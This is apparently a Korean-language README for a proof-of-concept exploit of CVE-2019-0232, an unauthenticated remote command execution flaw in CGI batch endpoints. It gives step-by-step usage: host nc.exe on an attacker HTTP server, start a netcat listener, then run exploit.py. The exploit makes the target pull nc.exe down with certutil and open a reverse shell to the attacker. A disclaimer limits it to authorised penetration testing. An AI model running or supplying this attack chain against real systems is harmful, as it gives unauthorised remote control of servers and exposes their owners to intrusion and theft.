
/jaiguptanick/CVE-2019-0232 기반 익스플로잇
인증되지 않은 RCE를 CGI 배치 엔드포인트를 통해 수행하는 PoC입니다. certutil을 사용하여 타겟에 nc.exe를 다운로드하고 리버스 셸을 트리거합니다.
1. nc.exe 서빙 (nc.exe가 있는 동일 디렉토리에서):
python3 -m http.server 80
2. 리스너 시작:
nc -lvnp 1234
3. 익스플로잇 실행:
python3 exploit.py \
--url http://:/cgi/.bat \
--server-ip \
--server-port 80 \
--nc-ip \
--nc-port 1234
| 인수 | 필수 | 기본값 | 설명 |
|---|---|---|---|
--url | ✅ | — | CGI 엔드포인트가 포함된 전체 타겟 URL |
--server-ip | ✅ | — | HTTP로 nc.exe를 서빙하는 당신의 IP |
--server-port | ❌ | 80 | HTTP 서버 포트 |
--nc-ip | ✅ | — | 당신의 Netcat 리스너 IP |
--nc-port | ✅ | — | 당신의 Netcat 리스너 포트 |
공인된 침투 테스트 및 교육 목적으로만 사용하십시오.